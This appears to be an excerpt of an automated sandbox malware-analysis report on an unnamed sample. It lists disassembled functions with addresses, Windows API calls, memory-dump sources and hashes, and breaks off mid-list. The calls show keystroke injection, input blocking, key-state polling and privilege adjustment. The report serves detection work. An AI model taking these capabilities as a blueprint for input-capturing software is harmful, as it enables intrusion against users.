                                                                                                                              • API String ID: 3420055661-0
                                                                                                                              • Opcode ID: 866d8f8f1e33e2d2cf9ccc86cae216a25b2dc685ce6ad50a133b5d0aaa635978
                                                                                                                              • Instruction ID: 1457021453108e9745426c7b761ac8d28b40bb5a23643e7857ae6a62aa3bb4d5
                                                                                                                              • Opcode Fuzzy Hash: 866d8f8f1e33e2d2cf9ccc86cae216a25b2dc685ce6ad50a133b5d0aaa635978
                                                                                                                              • Instruction Fuzzy Hash: 68F05E72400118FFEF049F95EC099BEBFB9FF44351F14401AF902A2160D7B5AA51EB60
                                                                                                                              Function 001BD712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,001CC2E2,?,?,00000000,?), ref: 001BD73F
                                                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,001CC2E2,?,?,00000000,?), ref: 001BD751
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3479602957-0
                                                                                                                              • Opcode ID: 31e84c6f46b5adeed7269265df666fb01d3b305b5cbae821d9c2fa9e0d3d48c5
                                                                                                                              • Instruction ID: c770f819db9b6663c8e33d9417d29a3c121594558568884f0338773e5342041c
                                                                                                                              • Opcode Fuzzy Hash: 31e84c6f46b5adeed7269265df666fb01d3b305b5cbae821d9c2fa9e0d3d48c5
                                                                                                                              • Instruction Fuzzy Hash: 74F08C3510032DABDB21AFA4DC49FEA776DBF49365F008155F909D6181E7309A80CFA0
                                                                                                                              Function 001B4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 001B4B89
                                                                                                                              • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 001B4B9C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InputSendkeybd_event
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3536248340-0
                                                                                                                              • Opcode ID: 829a31c179a33dd827efd75d368861ff08fcc57da7db6d9bfb1a25312ea80a8b
                                                                                                                              • Instruction ID: 0f31956a9ed0601bbbb3409b518ab9a703d1f38c04de9cd283f4b55c86e3bb3a
                                                                                                                              • Opcode Fuzzy Hash: 829a31c179a33dd827efd75d368861ff08fcc57da7db6d9bfb1a25312ea80a8b
                                                                                                                              • Instruction Fuzzy Hash: C0F06D7080424DAFDB058FA0C805BBE7BB4AF00305F00C409F951A51A2D779C616DF90
                                                                                                                              Function 001AB8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 001AB8C5
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001AB8D7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 81990902-0
                                                                                                                              • Opcode ID: 3c861dcc3cf0ff61f5b814439cb1a1cb435b9ba2b89ff95d5bc0a411b93bfd9c
                                                                                                                              • Instruction ID: da813ab522add1ac20b1cff64621c24116577f057ca38a6840d3365074323eef
                                                                                                                              • Opcode Fuzzy Hash: 3c861dcc3cf0ff61f5b814439cb1a1cb435b9ba2b89ff95d5bc0a411b93bfd9c
                                                                                                                              • Instruction Fuzzy Hash: CEE0EC72004611EFEB262B64FC09D777BEEEF08311B108869F49681870DB62ACD1DB10
                                                                                                                              Function 001DF594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 001DF59C
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,001EF3AD,?,?,?,?), ref: 001DF5C6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogLongNtdllProc_Window
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2065330234-0
                                                                                                                              • Opcode ID: 53429eca3edfbbb8e9eff86990b309bd1b3f53908ba6d2a56fab13abe23b89a5
                                                                                                                              • Instruction ID: 1bdace55c3f665a8e1a52ae308ba2da4075aa95edec28611d23c521ff60ff992
                                                                                                                              • Opcode Fuzzy Hash: 53429eca3edfbbb8e9eff86990b309bd1b3f53908ba6d2a56fab13abe23b89a5
                                                                                                                              • Instruction Fuzzy Hash: A7E0CD70104218BBEB140F09FC09F793B15F700750F10851AF917C80E0D7B095E1E660
                                                                                                                              Function 00198E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0017125D,00197A43,00170F35,?,?,00000001), ref: 00198E41
                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00198E4A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: 2bbb27d9f6728bebf378dc715cad281b13395683be77185fa2051628b603674d
                                                                                                                              • Instruction ID: 8abb01cd625fd04c7030095f5ecc94b88b3825d95df51a5a09aee833d7053d2a
                                                                                                                              • Opcode Fuzzy Hash: 2bbb27d9f6728bebf378dc715cad281b13395683be77185fa2051628b603674d
                                                                                                                              • Instruction Fuzzy Hash: EAB092B1048A08ABEB002BA1FC09BB83F6AFB08A62F014010F71D448608B635490CA92
                                                                                                                              Function 001A113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7a0ea1672c947e7d2f69b2f5884e7fbe4cb9d8b509fa1022d8838a95ed80eaf0
                                                                                                                              • Instruction ID: 5e880fdf3779dc36a23199938a395a25ac906b884635c6e458e2f648ab1311d5
                                                                                                                              • Opcode Fuzzy Hash: 7a0ea1672c947e7d2f69b2f5884e7fbe4cb9d8b509fa1022d8838a95ed80eaf0
                                                                                                                              • Instruction Fuzzy Hash: 5CB10220D2AF504DD7239639983933BB65DAFBB2C5F91D71BFC2A70D22EB2185834580
                                                                                                                              Function 001E02AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 001E0352
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogLongNtdllProc_Window
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2065330234-0
                                                                                                                              • Opcode ID: d0cd7a615615308f90aa306f0b73a8601268b49820730b67dcbe27002d1b89af
                                                                                                                              • Instruction ID: 574c2365fcc042510f04492399b0aa5b7e422d8fb657f436b846513e321f745e
                                                                                                                              • Opcode Fuzzy Hash: d0cd7a615615308f90aa306f0b73a8601268b49820730b67dcbe27002d1b89af
                                                                                                                              • Instruction Fuzzy Hash: F7119C31204695BFFB2A1B2DDC0AFBD3714FB09720F204315F9215A2E2CBE49D80D268
                                                                                                                              Function 001DE769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018B155: GetWindowLongW.USER32(?,000000EB), ref: 0018B166
                                                                                                                              • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 001DE7AF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CallLongProc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4084987330-0
                                                                                                                              • Opcode ID: 7ab22869fc8420776a4da4ab64dd47fffe1e4b39b029da0898f7cf8c49295563
                                                                                                                              • Instruction ID: 9b1876d278fc925b9ea33406222454fb0264fb0b01b0c79d00e1480edcb6122f
                                                                                                                              • Opcode Fuzzy Hash: 7ab22869fc8420776a4da4ab64dd47fffe1e4b39b029da0898f7cf8c49295563
                                                                                                                              • Instruction Fuzzy Hash: DDF0FF76104108EFCF49AF54EC44DB93BE6EB04361B044515F9158A6B1C7329D71EB90
                                                                                                                              Function 001DEA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                                • Part of subcall function 0018B736: GetCursorPos.USER32(000000FF), ref: 0018B749
                                                                                                                                • Part of subcall function 0018B736: ScreenToClient.USER32(00000000,000000FF), ref: 0018B766
                                                                                                                                • Part of subcall function 0018B736: GetAsyncKeyState.USER32(00000001), ref: 0018B78B
                                                                                                                                • Part of subcall function 0018B736: GetAsyncKeyState.USER32(00000002), ref: 0018B799
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,001EF417,?,?,?,?,?,00000001,?), ref: 001DEA9C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2356834413-0
                                                                                                                              • Opcode ID: f034964f89c2b9bc6cdd170dff814e98d97718adc7976c2b788ed9043bde9e50
                                                                                                                              • Instruction ID: 31f3b35b4d51870f52867e41685b9c1da2a9c6322ace4b9654ea6f0c087090d3
                                                                                                                              • Opcode Fuzzy Hash: f034964f89c2b9bc6cdd170dff814e98d97718adc7976c2b788ed9043bde9e50
                                                                                                                              • Instruction Fuzzy Hash: 22F08275100219ABDB146F15DC0AABA3FA1FB00751F404015F9061B1A1D7769971DBD1
                                                                                                                              Function 0018B7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0018AF40,?,?,?,?,?), ref: 0018B83B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogLongNtdllProc_Window
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2065330234-0
                                                                                                                              • Opcode ID: 7cca0378974d511446f0bd274442f54b7375b48c9a1e24462a91863106594ed8
                                                                                                                              • Instruction ID: 9b66b59b8d0aad87612855bb567b2863ddb30e3bde3a68f44b5c01bcd2d240de
                                                                                                                              • Opcode Fuzzy Hash: 7cca0378974d511446f0bd274442f54b7375b48c9a1e24462a91863106594ed8
                                                                                                                              • Instruction Fuzzy Hash: 8FF08274600209DFEB18EF15E8949393BA6FB05360F104629F9524B2B0D771D961DB54
                                                                                                                              Function 001C703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • BlockInput.USER32(00000001), ref: 001C7057
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BlockInput
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3456056419-0
                                                                                                                              • Opcode ID: 6af4409d59e58ead69612f0282b83cf984686f6c2f80df4ab0e95277ebbd47c1
                                                                                                                              • Instruction ID: 199554b0ee20a70ccb23272aeddff82a1b48944fb8734b163a2a70fd0360bb26
                                                                                                                              • Opcode Fuzzy Hash: 6af4409d59e58ead69612f0282b83cf984686f6c2f80df4ab0e95277ebbd47c1
                                                                                                                              • Instruction Fuzzy Hash: EDE048352042045FC710EFA9D408E96F7ED9F65750F01C42AF945D7291DBF0E8408F90
                                                                                                                              Function 001DF3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 001DF41A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogNtdllProc_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3239928679-0
                                                                                                                              • Opcode ID: 7d2c03a3ad4f6b7d173f7c47f6fd50984283930b73bef3570207879943947938
                                                                                                                              • Instruction ID: 6cdabc855453c5b7c8a7e3ba881f63edfb000a56be52ad6144ab21842045d621
                                                                                                                              • Opcode Fuzzy Hash: 7d2c03a3ad4f6b7d173f7c47f6fd50984283930b73bef3570207879943947938
                                                                                                                              • Instruction Fuzzy Hash: 37F06D31200259AFDB21DF58EC09FD63BA5FB05360F044419BA11672E1CB70B920D764
                                                                                                                              Function 0018AC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0018ACC7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogLongNtdllProc_Window
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2065330234-0
                                                                                                                              • Opcode ID: 26cb1b54215724d41878579d096ac30adbe0f65017f4548360ef9a64a36aa3ad
                                                                                                                              • Instruction ID: df186731d271b6da708ec856b6dda27868573256fcc77f6a14cdeb08d88813fc
                                                                                                                              • Opcode Fuzzy Hash: 26cb1b54215724d41878579d096ac30adbe0f65017f4548360ef9a64a36aa3ad
                                                                                                                              • Instruction Fuzzy Hash: B8E0EC75100208FBDF05AF90EC55E683B26FF59354F508419F6054A6A1CB32A522EF55
                                                                                                                              Function 001DF425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,001EF3D4,?,?,?,?,?,?), ref: 001DF450
                                                                                                                                • Part of subcall function 001DE13E: _memset.LIBCMT ref: 001DE14D
                                                                                                                                • Part of subcall function 001DE13E: _memset.LIBCMT ref: 001DE15C
                                                                                                                                • Part of subcall function 001DE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00233EE0,00233F24), ref: 001DE18B
                                                                                                                                • Part of subcall function 001DE13E: CloseHandle.KERNEL32 ref: 001DE19D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
